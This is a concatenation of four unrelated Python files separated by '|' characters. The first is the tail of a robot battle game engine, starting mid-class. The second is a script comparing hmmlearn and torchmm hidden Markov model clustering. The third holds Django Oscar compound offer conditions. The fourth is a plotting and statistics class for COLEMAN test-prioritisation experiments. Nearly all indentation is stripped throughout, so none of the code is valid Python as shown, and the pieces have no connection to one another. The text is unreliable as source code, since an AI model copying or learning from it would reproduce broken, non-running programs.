@staticmethod
def parse_command(action):
return (action[0], action[1:])
def issue_command(self, action, actions):
cmd, params = InternalRobot.parse_command(action)
if cmd == 'move' or cmd == 'attack':
getattr(self, 'call_' + cmd)(params[0], actions)
if cmd == 'suicide':
self.call_suicide(actions)
def get_robots_around(self, loc):
locs_around = rg.locs_around(loc, filter_out=['obstacle', 'invalid'])
locs_around.append(loc)
robots = [self.field[x] for x in locs_around]
return [x for x in robots if x is not None]
def movable_loc(self, loc):
good_around = rg.locs_around(self.location,
filter_out=['invalid', 'obstacle'])
return loc in good_around
def can_act(self, loc, action_table, no_raise=False, move_stack=None):
global settings
if move_stack is not None and self in move_stack:
return self == move_stack[0]
if not self.movable_loc(loc):
return False
moving = []
nearby_robots = self.get_robots_around(loc)
for robot in nearby_robots:
if robot == self:
continue
cmd, params = InternalRobot.parse_command(action_table[robot])
if cmd == 'suicide' and robot.location == loc:
continue
if cmd == 'guard' and robot.location == loc:
if no_raise:
return False
raise UnitGuardCollision(robot)
if cmd == 'attack' and robot.location == loc:
if no_raise:
return False
raise UnitBlockCollision(robot)
if cmd == 'move':
if params[0] == loc:
moving.append(robot)
elif robot.location == loc:
if move_stack is None:
move_stack = [self]
move_stack.append(robot)
if not robot.can_act(params[0], action_table, True, move_stack):
if no_raise:
return False
raise UnitBlockCollision(robot)
if len(moving) > 0:
if no_raise:
return False
raise UnitMoveCollision(moving)
return True
def call_move(self, loc, action_table):
global settings
try:
if self.can_act(loc, action_table):
self.location = loc
except UnitGuardCollision as e:
if e.other_robot.player_id != self.player_id:
self.hp -= settings.collision_damage
except UnitMoveCollision as e:
for robot in e.other_robots:
if robot.player_id != self.player_id:
robot.hp -= settings.collision_damage
except UnitBlockCollision as e:
if e.other_robot.player_id != self.player_id:
self.hp -= settings.collision_damage
e.other_robot.hp -= settings.collision_damage
except RobotException:
pass
def call_attack(self, loc, action_table, damage=None):
if damage is None:
damage = random.randint(*settings.attack_range)
try:
self.can_act(loc, action_table)
except UnitGuardCollision as e:
if e.other_robot.player_id != self.player_id:
e.other_robot.hp -= int(damage / 2)
except UnitMoveCollision as e:
for robot in e.other_robots:
if robot.player_id != self.player_id:
robot.hp -= damage
except UnitBlockCollision as e:
if e.other_robot.player_id != self.player_id:
e.other_robot.hp -= int(damage)
except RobotException:
pass
def call_suicide(self, action_table):
self.hp = 0
self.call_attack(self.location, action_table, damage=settings.suicide_damage)
for loc in rg.locs_around(self.location):
self.call_attack(loc, action_table, damage=settings.suicide_damage)
@staticmethod
def is_valid_action(action):
global settings
cmd, params = InternalRobot.parse_command(action)
return cmd in settings.valid_commands
# just to make things easier
class Field:
def __init__(self, size):
self.field = [[None for x in range(size)] for y in range(size)]
def __getitem__(self, point):
return self.field[point[1]][point[0]]
def __setitem__(self, point, v):
self.field[point[1]][point[0]] = v
class Game:
def __init__(self, player1, player2, record_turns=False):
self._players = (player1, player2)
self.turns = 0
self._robots = []
self._field = Field(settings.board_size)
self._record = record_turns
if self._record:
self.history = [[] for i in range(2)]
def build_game_info(self):
global settings
return {
'robots': dict((
y.location,
dict((x, getattr(y, x)) for x in settings.exposed_properties)
) for y in self._robots),
'turn': self.turns,
}
def notify_new_turn(self):
for player_id in range(2):
user_robot = self._players[player_id].get_robot()
if hasattr(user_robot, 'on_new_turn'):
if inspect.ismethod(user_robot.on_new_turn):
user_robot.on_new_turn()
def make_robots_act(self):
global settings
game_info = self.build_game_info()
actions = {}
for robot in self._robots:
user_robot = self._players[robot.player_id].get_robot()
for prop in settings.exposed_properties:
setattr(user_robot, prop, getattr(robot, prop))
try:
next_action = user_robot.act(game_info)
if not InternalRobot.is_valid_action(next_action):
raise Exception('%s is not a valid action' % str(next_action))
except Exception:
print "The robot at (%s, %s) raised an exception:" % robot.location
print '-' * 60
traceback.print_exc(file=sys.stdout)
print '-' * 60
next_action = ['guard']
actions[robot] = next_action
for robot, action in actions.iteritems():
old_loc = robot.location
robot.issue_command(action, actions)
if robot.location != old_loc:
self._field[old_loc] = None
self._field[robot.location] = robot
def robot_at_loc(self, loc):
robot = self._field[loc]
return robot.player_id if robot else None
def spawn_robot(self, player_id, loc):
if self.robot_at_loc(loc) is not None:
return False
robot = InternalRobot(loc, settings.robot_hp, player_id, self._field)
self._robots.append(robot)
self._field[loc] = robot
def spawn_robot_batch(self):
global settings
locs = random.sample(settings.spawn_coords, settings.spawn_per_player * 2)
for player_id in range(2):
for i in range(settings.spawn_per_player):
self.spawn_robot(player_id, locs.pop())
def clear_spawn_points(self):
for loc in settings.spawn_coords:
if self._field[loc] is not None:
self._robots.remove(self._field[loc])
self._field[loc] = None
def remove_dead(self):
to_remove = [x for x in self._robots if x.hp <= 0]
for robot in to_remove:
self._robots.remove(robot)
if self._field[robot.location] == robot:
self._field[robot.location] = None
def make_history(self):
        # record a per-player snapshot of each robot's exposed properties for this turn
global settings
robots = [[] for i in range(2)]
for robot in self._robots:
robot_info = []
for prop in settings.exposed_properties:
if prop != 'player_id':
robot_info.append(getattr(robot, prop))
robots[robot.player_id].append(robot_info)
return robots
def run_turn(self):
global settings
self.notify_new_turn()
self.make_robots_act()
self.remove_dead()
if self.turns % settings.spawn_every == 0:
self.clear_spawn_points()
self.spawn_robot_batch()
if self._record:
round_history = self.make_history()
for i in (0, 1):
self.history[i].append(round_history[i])
self.turns += 1
def get_scores(self):
scores = [0, 0]
for robot in self._robots:
scores[robot.player_id] += 1
return scores
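# Rough usage sketch (hypothetical file paths and turn count; the map file is the
# literal dict read by init_settings above):
#
#   init_settings('maps/default.py')
#   game = Game(Player(code=open('bot1.py').read()),
#               Player(code=open('bot2.py').read()),
#               record_turns=True)
#   for turn in range(100):
#       game.run_turn()
#   print game.get_scores()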
|
from itertools import cycle, islice
from functools import partial
from sklearn.preprocessing import StandardScaler
from sklearn import datasets
import torch
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
import numpy as np
from hmmlearn.hmm import GaussianHMM
from torchmm.hmm import HiddenMarkovModel
from torchmm.base import DiagNormalModel
from torchmm.utils import kmeans_init
from torchmm.utils import kmeans
GaussianHMM = partial(GaussianHMM,
transmat_prior=2,
startprob_prior=2,
covars_prior=1,
covars_weight=1,
means_prior=0,
means_weight=0,
n_iter=100,
# min_covar=5,
tol=1e-3,
)
# np.random.seed(0)
# ============
# Generate datasets. We choose the size big enough to see the scalability
# of the algorithms, but not too big to avoid too long running times
# ============
n_samples = 1500
noisy_circles = datasets.make_circles(n_samples=n_samples, factor=.5,
noise=.05)
noisy_moons = datasets.make_moons(n_samples=n_samples, noise=.05)
blobs = datasets.make_blobs(n_samples=n_samples, random_state=8)
no_structure = np.random.rand(n_samples, 2), None
# Anisotropicly distributed data
random_state = 170
X, y = datasets.make_blobs(n_samples=n_samples, random_state=random_state)
transformation = [[0.6, -0.6], [-0.4, 0.8]]
X_aniso = np.dot(X, transformation)
aniso = (X_aniso, y)
# blobs with varied variances
varied = datasets.make_blobs(n_samples=n_samples,
cluster_std=[1.0, 2.5, 0.5],
random_state=random_state)
# ============
# Set up cluster parameters
# ============
plt.figure(figsize=(9 * 2 + 3, 12.5))
plt.subplots_adjust(left=.02, right=.98, bottom=.001, top=.96, wspace=.05,
hspace=.01)
plot_num = 1
default_base = {'quantile': .3,
'eps': .3,
'damping': .9,
'preference': -200,
'n_neighbors': 10,
'n_clusters': 3,
'min_samples': 20,
'xi': 0.05,
'min_cluster_size': 0.1}
datasets = [
(noisy_circles, {'damping': .77, 'preference': -240,
'quantile': .2, 'n_clusters': 2,
'min_samples': 20, 'xi': 0.25}),
(noisy_moons, {'damping': .75, 'preference': -220, 'n_clusters': 2}),
(varied, {'eps': .18, 'n_neighbors': 2,
'min_samples': 5, 'xi': 0.035, 'min_cluster_size': .2}),
(aniso, {'eps': .15, 'n_neighbors': 2,
'min_samples': 20, 'xi': 0.1, 'min_cluster_size': .2}),
(blobs, {}),
(no_structure, {})]
for i_dataset, (dataset, algo_params) in enumerate(datasets):
# update parameters with dataset-specific values
params = default_base.copy()
params.update(algo_params)
# print(params)
X, y = dataset
# normalize dataset for easier parameter selection
X = StandardScaler().fit_transform(X)
n_states = params['n_clusters']
samples = X
lengths = np.array([1 for s in X])
# assert len(samples) >= n_states
hmm = GaussianHMM(n_components=n_states)
hmm.fit(samples, lengths)
y_pred = hmm.predict(samples, lengths)
means = hmm.means_
# print('covars shape')
# print(hmm.covars_.shape)
var = [np.diag(c) for c in hmm.covars_]
std = np.sqrt(np.stack(var))
# print(std)
plt.subplot(len(datasets), 2, plot_num)
if i_dataset == 0:
plt.title('hmmlearn', size=18)
colors = np.array(list(islice(cycle(['#377eb8', '#ff7f00', '#4daf4a',
'#f781bf', '#a65628', '#984ea3',
'#999999', '#e41a1c', '#dede00']),
int(max(y_pred) + 1))))
# add black color for outliers (if any)
colors = np.append(colors, ["#000000"])
plt.scatter(X[:, 0], X[:, 1], s=10,
color=colors[y_pred])
plt.scatter(means[:, 0], means[:, 1], s=20, color='red')
ax = plt.gca()
for i in range(std.shape[0]):
ellipse = Ellipse(means[i], width=(
2 * std[i, 0]), height=(2 * std[i, 1]), alpha=0.3, edgecolor="red")
ax.add_patch(ellipse)
plt.xlim(-2.5, 2.5)
plt.ylim(-2.5, 2.5)
plt.xticks(())
plt.yticks(())
plot_num += 1
# TORCHMM
X = torch.from_numpy(X).float().unsqueeze(1)
# print(X.shape)
# fit
T0 = torch.zeros(n_states).softmax(0)
T = torch.zeros((n_states, n_states)).softmax(1)
init_centroids = kmeans(X.squeeze(), n_states)
centroids = init_centroids.clone()
states = []
for s_idx in range(n_states):
precisions = torch.ones(2)
states.append(DiagNormalModel(centroids[s_idx], precisions))
hmm = HiddenMarkovModel(states, T0=T0, T=T)
converged = hmm.fit(X, epsilon=1e-8)
print()
print('CONVERGED', converged)
print()
score = hmm.log_prob(X) # + hmm.log_parameters_prob()
print('ll', score)
# print('ll (no prior)', hmm.log_prob(X))
print("Pi Matrix: ")
print(hmm.T0)
# print("Transition Matrix: ")
# print(hmm.T)
# assert np.allclose(transition.exp().data.numpy(), True_T, atol=0.1)
# print()
# print("Emission Matrix: ")
# for s in hmm.states:
# print("Means")
# print(list(s.parameters())[0])
# print("Variance")
# print(1/list(s.parameters())[1])
means = torch.stack([list(s.parameters())[0] for s in states])
means = means.detach().numpy()
precs = torch.stack([list(s.parameters())[1] for s in states])
# precs = precs.detach().numpy()
std = (1/precs.sqrt()).detach().numpy()
# print('std', std)
y_pred, _ = hmm.decode(X)
y_pred = y_pred.squeeze(1)
# END FIT
plt.subplot(len(datasets), 2, plot_num)
if i_dataset == 0:
plt.title('torchmm', size=18)
colors = np.array(list(islice(cycle(['#377eb8', '#ff7f00', '#4daf4a',
'#f781bf', '#a65628', '#984ea3',
'#999999', '#e41a1c', '#dede00']),
int(max(y_pred) + 1))))
# add black color for outliers (if any)
colors = np.append(colors, ["#000000"])
plt.scatter(X.squeeze(1)[:, 0], X.squeeze(1)[:, 1], s=10,
color=colors[y_pred])
plt.scatter(init_centroids[:, 0], init_centroids[:, 1], s=20,
color="black")
plt.scatter(means[:, 0], means[:, 1], s=20, color='red')
ax = plt.gca()
for i in range(precs.shape[0]):
ellipse = Ellipse(means[i], width=(
2 * std[i, 0]), height=(2 * std[i, 1]), alpha=0.3, edgecolor="red")
ax.add_patch(ellipse)
plt.xlim(-2.5, 2.5)
plt.ylim(-2.5, 2.5)
plt.xticks(())
plt.yticks(())
plot_num += 1
plt.show()
|
from decimal import Decimal as D, ROUND_UP
from django.core import exceptions
from django.db import models
from django.utils.translation import gettext_lazy as _
from oscar.apps.offer import utils
from oscar.apps.offer.conditions import (
CountCondition,
CoverageCondition,
ValueCondition,
)
from oscar.core.loading import get_model
from oscar.templatetags.currency_filters import currency
Condition = get_model("offer", "Condition")
def _default_clean(self):
if not self.range:
raise exceptions.ValidationError(_("Selected condition type requires a range."))
if not self.value:
        raise exceptions.ValidationError(_("Selected condition type requires a value."))
class BluelightCountCondition(CountCondition):
_description = _("Basket includes %(count)d item(s) from %(range)s")
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Count condition")
verbose_name_plural = _("Count conditions")
@property
def name(self):
return self._description % {
"count": self.value,
"range": str(self.range).lower() if self.range else _("product range"),
}
@property
def description(self):
return self._description % {
"count": self.value,
"range": utils.range_anchor(self.range)
if self.range
else _("product range"),
}
def _clean(self):
return _default_clean(self)
def consume_items(self, offer, basket, affected_lines):
"""
Same as CountCondition.consume_items, except that it returns a list of consumed items. This
is needed for CompoundCondition to be able to correctly consume items.
"""
applicable_lines = self.get_applicable_lines(
offer, basket, most_expensive_first=True
)
applicable_line_ids = set(line.id for __, line in applicable_lines)
num_consumed = 0
affected_lines = list(affected_lines)
for line, __, quantity in affected_lines:
if line.id in applicable_line_ids:
num_consumed += quantity
to_consume = max(0, self.value - num_consumed)
if to_consume == 0:
return affected_lines
for __, line in applicable_lines:
quantity_to_consume = min(line.quantity_without_discount, to_consume)
line.consume(quantity_to_consume)
affected_lines.append((line, 0, quantity_to_consume))
to_consume -= quantity_to_consume
if to_consume == 0:
break
return affected_lines
class BluelightCoverageCondition(CoverageCondition):
_description = _("Basket includes %(count)d distinct item(s) from %(range)s")
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Coverage Condition")
verbose_name_plural = _("Coverage Conditions")
@property
def name(self):
return self._description % {
"count": self.value,
"range": str(self.range).lower() if self.range else _("product range"),
}
@property
def description(self):
return self._description % {
"count": self.value,
"range": utils.range_anchor(self.range)
if self.range
else _("product range"),
}
def _clean(self):
return _default_clean(self)
def consume_items(self, offer, basket, affected_lines):
"""
Same as CoverageCondition.consume_items, except that it returns a list of consumed items. This
is needed for CompoundCondition to be able to correctly consume items.
"""
applicable_lines = self.get_applicable_lines(
offer, basket, most_expensive_first=True
)
applicable_line_ids = set(line.id for __, line in applicable_lines)
consumed_products = []
affected_lines = list(affected_lines)
for line, __, quantity in affected_lines:
if line.id in applicable_line_ids:
consumed_products.append(line.product)
to_consume = max(0, self.value - len(consumed_products))
if to_consume == 0:
return affected_lines
for line in basket.all_lines():
product = line.product
if not self.can_apply_condition(line):
continue
if product in consumed_products:
continue
if not line.is_available_for_offer_discount(offer):
continue
# Only consume a quantity of 1 from each line
line.consume(1)
affected_lines.append((line, 0, 1))
consumed_products.append(product)
to_consume -= 1
if to_consume == 0:
break
return affected_lines
class BluelightValueCondition(ValueCondition):
_description = _("Basket includes %(amount)s (%(tax)s) from %(range)s")
_tax_inclusive = False
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Value condition")
verbose_name_plural = _("Value conditions")
@property
def name(self):
return self._description % {
"amount": currency(self.value),
"tax": _("tax-inclusive") if self._tax_inclusive else _("tax-exclusive"),
"range": str(self.range).lower() if self.range else _("product range"),
}
@property
def description(self):
return self._description % {
"amount": currency(self.value),
"tax": _("tax-inclusive") if self._tax_inclusive else _("tax-exclusive"),
"range": utils.range_anchor(self.range)
if self.range
else _("product range"),
}
def _clean(self):
return _default_clean(self)
def is_satisfied(self, offer, basket):
"""
Determine whether a given basket meets this condition
"""
value_of_matches = D("0.00")
for line in basket.all_lines():
if self.can_apply_condition(line) and line.quantity_without_discount > 0:
price = self._get_unit_price(offer, line)
value_of_matches += price * int(line.quantity_without_discount)
if value_of_matches >= self.value:
return True
return False
def _get_value_of_matches(self, offer, basket):
if hasattr(self, "_value_of_matches"):
return getattr(self, "_value_of_matches")
value_of_matches = D("0.00")
for line in basket.all_lines():
if self.can_apply_condition(line) and line.quantity_without_discount > 0:
price = self._get_unit_price(offer, line)
value_of_matches += price * int(line.quantity_without_discount)
self._value_of_matches = value_of_matches
return value_of_matches
def _get_unit_price(self, offer, line):
price = utils.unit_price(offer, line)
if self._tax_inclusive and line.is_tax_known:
price += line.unit_tax
return price
def consume_items(self, offer, basket, affected_lines):
"""
Same as ValueCondition.consume_items, except that it returns a list of consumed items. This
is needed for CompoundCondition to be able to correctly consume items.
"""
applicable_lines = self.get_applicable_lines(
offer, basket, most_expensive_first=True
)
applicable_line_ids = set(line.id for __, line in applicable_lines)
value_consumed = D("0.00")
affected_lines = list(affected_lines)
for line, __, qty in affected_lines:
if line.id in applicable_line_ids:
price = self._get_unit_price(offer, line)
value_consumed += price * qty
to_consume = max(0, self.value - value_consumed)
if to_consume == 0:
return affected_lines
for price, line in applicable_lines:
quantity_to_consume = (to_consume / price).quantize(D(1), ROUND_UP)
quantity_to_consume = min(
line.quantity_without_discount, quantity_to_consume
)
line.consume(quantity_to_consume)
affected_lines.append((line, 0, quantity_to_consume))
to_consume -= price * quantity_to_consume
if to_consume <= 0:
break
return affected_lines
class BluelightTaxInclusiveValueCondition(BluelightValueCondition):
_tax_inclusive = True
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Tax-Inclusive Value Condition")
verbose_name_plural = _("Tax-Inclusive Value Conditions")
class CompoundCondition(Condition):
"""
An offer condition that aggregates together multiple other conditions,
allowing the creation of compound rules for offers.
"""
AND, OR = ("AND", "OR")
CONJUNCTION_TYPE_CHOICES = (
(AND, _("Logical AND")),
(OR, _("Logical OR")),
)
conjunction = models.CharField(
_("Sub-Condition conjunction type"),
choices=CONJUNCTION_TYPE_CHOICES,
default=AND,
max_length=10,
help_text="Select the conjunction which will be used to logically join the sub-conditions together.",
)
subconditions = models.ManyToManyField(
"offer.Condition",
related_name="parent_conditions",
verbose_name=_("Sub-Conditions"),
help_text=_(
"Select the sub-conditions that this compound-condition will combine."
),
)
class Meta:
app_label = "offer"
verbose_name = _("Compound condition")
verbose_name_plural = _("Compound conditions")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.proxy_class = "%s.%s" % (
CompoundCondition.__module__,
CompoundCondition.__name__,
)
@property
def children(self):
if self.pk is None:
return []
chil = [c for c in self.subconditions.order_by("id").all() if c.id != self.id]
return chil
@property
def name(self):
names = (c.name for c in self.children)
return self._human_readable_conjoin(names, _("Empty Condition"))
@property
def description(self):
descrs = (c.description for c in self.children)
return self._human_readable_conjoin(descrs, _("Empty Condition"))
def _clean(self):
if self.range:
raise exceptions.ValidationError(
_("Compound conditions should not have a range.")
)
if self.value:
raise exceptions.ValidationError(
_("Compound conditions should not have a value.")
)
def is_satisfied(self, *args):
return self._reduce_results(self.conjunction, "is_satisfied", *args)
def is_partially_satisfied(self, *args):
return self._reduce_results(self.OR, "is_partially_satisfied", *args)
def get_upsell_message(self, offer, basket):
messages = []
for c in self.children:
condition = c.proxy()
partial = condition.is_partially_satisfied(offer, basket)
complete = condition.is_satisfied(offer, basket)
if not complete and partial:
messages.append(condition.get_upsell_message(offer, basket))
return self._human_readable_conjoin(messages)
def consume_items(self, offer, basket, affected_lines):
memo = affected_lines
for c in self.children:
affected_lines = c.proxy().consume_items(offer, basket, memo)
if affected_lines and affected_lines.__iter__:
memo = affected_lines
return affected_lines
def _human_readable_conjoin(self, strings, empty=None):
labels = {
self.AND: _(" and "),
self.OR: _(" or "),
}
strings = list(strings)
if len(strings) <= 0 and empty is not None:
return empty
return labels[self.conjunction].join(strings)
def _reduce_results(self, conjunction, method_name, *args):
result = self._get_conjunction_root_memo(conjunction)
for c in self.children:
condition = c.proxy()
fn = getattr(condition, method_name)
subresult = fn(*args)
result = self._apply_conjunction(conjunction, result, subresult)
return result
def _get_conjunction_root_memo(self, conjunction):
memos = {
self.AND: True,
self.OR: False,
}
return memos[conjunction]
def _apply_conjunction(self, conjunction, a, b):
fns = {
self.AND: lambda: a and b,
self.OR: lambda: a or b,
}
return fns[conjunction]()
__all__ = [
"BluelightCountCondition",
"BluelightCoverageCondition",
"BluelightValueCondition",
"CompoundCondition",
]
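# Usage sketch (hypothetical; assumes a configured Django project with the offer app
# migrated and two previously created sub-conditions `cond_a` and `cond_b`):
#
#   compound = CompoundCondition.objects.create(conjunction=CompoundCondition.AND)
#   compound.subconditions.add(cond_a, cond_b)
#   compound.is_satisfied(offer, basket)  # True only when both sub-conditions hold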
|
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# rpy2
import rpy2.robjects as ro
import seaborn as sns
import textwrap
import traceback
from pathlib import Path
from roses.effect_size import vargha_delaney
# roses
from roses.statistical_test.kruskal_wallis import kruskal_wallis
from rpy2.robjects import pandas2ri
from rpy2.robjects.conversion import localconverter
MAX_XTICK_WIDTH = 10
# For a beautiful plots
plt.style.use('ggplot')
sns.set_style("whitegrid")
sns.set(palette="pastel")
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.max_colwidth', None)
def exception_to_string(excp):
stack = traceback.extract_stack(
)[:-3] + traceback.extract_tb(excp.__traceback__) # add limit=??
pretty = traceback.format_list(stack)
return ''.join(pretty) + '\n {} {}'.format(excp.__class__, excp)
class Analisys(object):
"""
This class provide function to manage the result provide by COLEMAN
"""
def __init__(self, project_dir, results_dir, variant_folder=None, font_size_plots=25,
sched_time_ratio=[0.1, 0.5, 0.8], replace_names=[], columns_metrics=[]):
self.project_dir = project_dir
self.project = project_dir.split('/')[-1]
self.results_dir = results_dir
self.columns_metrics = columns_metrics
self.is_variant_test = variant_folder is not None
if self.is_variant_test:
self.figure_dir = f"{self.results_dir}_plots/{variant_folder}/{self.project}"
else:
self.figure_dir = f"{self.results_dir}_plots/{self.project}"
Path(self.figure_dir).mkdir(parents=True, exist_ok=True)
self.sched_time_ratio = sched_time_ratio
self.sched_time_ratio_names = [
str(int(tr * 100)) for tr in sched_time_ratio]
self.reward_names = {
'Time-ranked Reward': 'TimeRank',
'timerank': 'TimeRank', # From RETECS definition
'Reward Based on Failures': 'RNFail'
}
# Load the information about the system
self.df_system = self._get_df_system()
# Load the results from system
self.datasets = {}
self._load_datasets(variant_folder, replace_names)
self.font_size_plots = font_size_plots
self._update_rc_params()
def update_project(self, project_dir, variant_folder=None, replace_names=[]):
self.project_dir = project_dir
self.project = project_dir.split('/')[-1]
if self.is_variant_test:
self.figure_dir = f"{self.results_dir}_plots/{variant_folder}/{self.project}"
else:
self.figure_dir = f"{self.results_dir}_plots/{self.project}"
Path(self.figure_dir).mkdir(parents=True, exist_ok=True)
# Load the information about the system
self.df_system = self._get_df_system()
# Load the results from system
self.datasets = {}
self._load_datasets(variant_folder, replace_names)
def update_font_size(self, font_size_plots):
self.font_size_plots = font_size_plots
self._update_rc_params()
def _update_rc_params(self):
plt.rcParams.update({
'font.size': self.font_size_plots,
'xtick.labelsize': self.font_size_plots,
'ytick.labelsize': self.font_size_plots,
'legend.fontsize': self.font_size_plots,
'axes.titlesize': self.font_size_plots,
'axes.labelsize': self.font_size_plots,
'figure.max_open_warning': 0,
'pdf.fonttype': 42
})
def _get_df_system(self):
# Dataset Info
df = pd.read_csv(f'{self.project_dir}/features-engineered.csv', sep=';', thousands=',')
df = df.groupby(['BuildId'], as_index=False).agg({'Duration': np.sum})
df.rename(columns={'BuildId': 'step',
'Duration': 'duration'}, inplace=True)
return df
def _load_datasets(self, variant_folder=None, replace_names=[]):
for tr in self.sched_time_ratio_names:
if variant_folder is not None:
df_path = f"{self.results_dir}/time_ratio_{tr}/{variant_folder}"
else:
df_path = f"{self.results_dir}/time_ratio_{tr}"
df = pd.read_csv(f'{df_path}/{self.project}.csv', sep=';', thousands=',', low_memory=False)
df = df[['experiment', 'step', 'policy', 'reward_function', 'prioritization_time', 'time_reduction', 'ttf',
'fitness', 'avg_precision', 'cost', 'rewards']]
df['reward_function'] = df['reward_function'].apply(
lambda x: x if x == '-' else x.replace(x, self.reward_names[x]))
df['policy'] = df['policy'].apply(
lambda x: replace_names[x] if x in replace_names.keys() else x)
df = df[df.policy.isin(self.columns_metrics)]
df = df[df.reward_function != 'RNFail']
# df['name'] = df.apply(lambda row: f"{row['policy']} ({row['reward_function']})"
# if 'Deterministic' not in row['policy'] else 'Deterministic', axis=1)
# df['name'] = df['name'].apply(
# lambda x: 'Random' if 'Random' in x else x)
df['name'] = df['policy']
n_builds = len(df['step'].unique())
# Find the deterministic
dt = df[df['name'] == 'Deterministic']
            # As we have only one run for the deterministic policy, we replicate it to 30 independent runs
            # This allows us to compute the statistics without special-casing it
dt = dt.append([dt] * 29, ignore_index=True)
dt['experiment'] = np.repeat(list(range(1, 31)), n_builds)
# Clean
df = df[df['name'] != 'Deterministic']
df = df.append(dt)
df.sort_values(by=['name'], inplace=True)
df.drop_duplicates(inplace=True)
self.datasets[tr] = df
def _replace_names(self, df, names: dict, column='policy'):
return df[column].apply(lambda x: names[x] if x in names.keys() else x)
def replace_names(self, names: dict, column='policy'):
for key in self.datasets.keys():
self.datasets[key][column] = self._replace_names(
self.datasets[key], names, column)
def _get_metric_ylabel(self, column, rw=None):
metric = 'NAPFD'
ylabel = metric
if column == 'cost':
metric = 'APFDc'
ylabel = metric
elif column == 'ttf':
metric = 'RFTC'
ylabel = 'Rank of the Failing Test Cases'
elif column == 'prioritization_time':
metric = 'PrioritizationTime'
ylabel = 'Prioritization Time (sec.)'
elif column == "rewards":
metric = rw
ylabel = rw
return metric, ylabel
def _get_rewards(self):
if len(self.datasets.keys()) > 0:
return self.datasets[list(self.datasets.keys())[0]][
'reward_function'].unique()
else:
return []
def _get_policies(self):
if len(self.datasets.keys()) > 0:
return self.datasets[list(self.datasets.keys())[0]]['name'].unique()
else:
return []
def print_mean(self, df, column, direction='max'):
mean = df.groupby(['name'], as_index=False).agg(
{column: ['mean', 'std', 'max', 'min']})
mean.columns = ['name', 'mean', 'std', 'max', 'min']
# sort_df(mean)
# Round values (to be used in the article)
mean = mean.round({'mean': 4, 'std': 3, 'max': 4, 'min': 4})
mean = mean.infer_objects()
# minimum = mean[mean['mean'] > 0]
# minimum = minimum['mean'].idxmin()
minimum = mean['mean'].idxmin()
bestp = mean.loc[mean['mean'].idxmax() if direction ==
'max' else minimum]
val = 'Highest' if direction == 'max' else 'Lowest'
print(f"\n{val} Value found by {bestp['name']}: {bestp['mean']:.4f}")
print("\nMeans:")
print(mean)
return mean, bestp['name']
def print_mean_latex(self, x, column):
policies = self._get_policies()
print(*policies, sep="\t")
cont = len(policies)
for policy in policies:
df_temp = x[x.name == policy]
print(f"{df_temp[column].mean():.4f} $\pm$ {df_temp[column].std():.3f} ", end="")
cont -= 1
if cont != 0:
print("& ", end="")
print()
def _define_axies(self, ax, tr, column, ylabel=None):
metric, ylabel_temp = self._get_metric_ylabel(column)
ax.set_xlabel('CI Cycle', fontsize=self.font_size_plots)
ax.set_ylabel(ylabel + " " + metric if ylabel is not None else metric,
fontsize=self.font_size_plots)
ax.set_title(f"Time Budget: {tr}%", fontsize=self.font_size_plots)
def _plot_accumulative(self, df, ax, tr, column='fitness'):
df = df[['step', 'name', column]]
df.groupby(['step', 'name']).mean()[
column].unstack().cumsum().plot(ax=ax, linewidth=3)
self._define_axies(ax, tr, column, ylabel='Accumulative')
def plot_accumulative(self, figname, column='fitness'):
policies = self._get_policies()
fig, axes = plt.subplots(
ncols=len(self.datasets.keys()), sharex=True, sharey=True, figsize=(25, 8))
# Todo try a generic way
(ax1, ax2, ax3) = axes
for df_k, tr, ax in zip(self.datasets.keys(), self.sched_time_ratio_names, [ax1, ax2, ax3]):
self._plot_accumulative(self.datasets[df_k], ax, tr, column)
handles, labels = ax1.get_legend_handles_labels()
# lgd = fig.legend(handles, labels, bbox_to_anchor=(
# 0, -0.03, 1, 0.2), loc='lower center', ncol=len(policies))
# lgd = ax1.legend(handles, labels, bbox_to_anchor=(-0.02,
# 1.05, 1, 0.2), loc='lower left', ncol=len(policies))
lgd = fig.legend(handles, labels, bbox_to_anchor=(
0.98, 0.1), loc='lower right')
ax1.get_legend().remove()
ax2.get_legend().remove()
ax3.get_legend().remove()
plt.tight_layout()
plt.savefig(f"{self.figure_dir}/{figname}.pdf", bbox_inches='tight')
plt.cla()
plt.close(fig)
def _plot_lines(self, df, ax, tr, column='fitness'):
df = df[['step', 'name', column]]
df.groupby(['step', 'name']).mean()[
column].unstack().plot(ax=ax, linewidth=3)
self._define_axies(ax, tr, column)
def plot_lines(self, figname, column='fitness'):
policies = self._get_policies()
fig, axes = plt.subplots(
nrows=len(self.datasets.keys()), sharex=True, sharey=True, figsize=(25, 20))
# Todo try a generic way
(ax1, ax2, ax3) = axes
for df_k, tr, ax in zip(self.datasets.keys(), self.sched_time_ratio_names, [ax1, ax2, ax3]):
self._plot_lines(self.datasets[df_k], ax, tr, column)
handles, labels = ax1.get_legend_handles_labels()
lgd = ax1.legend(handles, labels, bbox_to_anchor=(-0.005, 1.05, 1, 0.2), loc='lower left',
ncol=len(policies))
ax2.get_legend().remove()
ax3.get_legend().remove()
plt.tight_layout()
plt.savefig(f"{self.figure_dir}/{figname}.pdf", bbox_inches='tight')
plt.cla()
plt.close(fig)
def _visualize_ntr(self, df, tr, ax, total_time_spent):
policies = self.columns_metrics
# Only the commits which failed
x = df[['experiment', 'name', 'time_reduction']
][(df.avg_precision == 123)]
df_ntr = pd.DataFrame(columns=['experiment', 'name', 'n_reduction'])
# print(*policies, sep="\t")
# cont = len(policies)
row = [tr]
means = []
for policy in policies:
df_ntr_temp = x[x.name == policy]
# sum all differences (time_reduction column) in all cycles for
# each experiment
df_ntr_temp = df_ntr_temp.groupby(['experiment'], as_index=False).agg({
'time_reduction': np.sum})
# Evaluate for each experiment
df_ntr_temp['n_reduction'] = df_ntr_temp['time_reduction'].apply(
lambda x: x / (total_time_spent))
df_ntr_temp['name'] = policy
df_ntr_temp = df_ntr_temp[['experiment', 'name', 'n_reduction']]
df_ntr = df_ntr.append(df_ntr_temp)
means.append(df_ntr_temp['n_reduction'].mean())
if means[-1] <= 0:
means[-1] = 0.0
text = f"{means[-1]:.4f} $\pm$ {df_ntr_temp['n_reduction'].std():.3f}"
row.append(text)
if len(df_ntr) > 0:
df_ntr.sort_values(by=['name', 'experiment'], inplace=True)
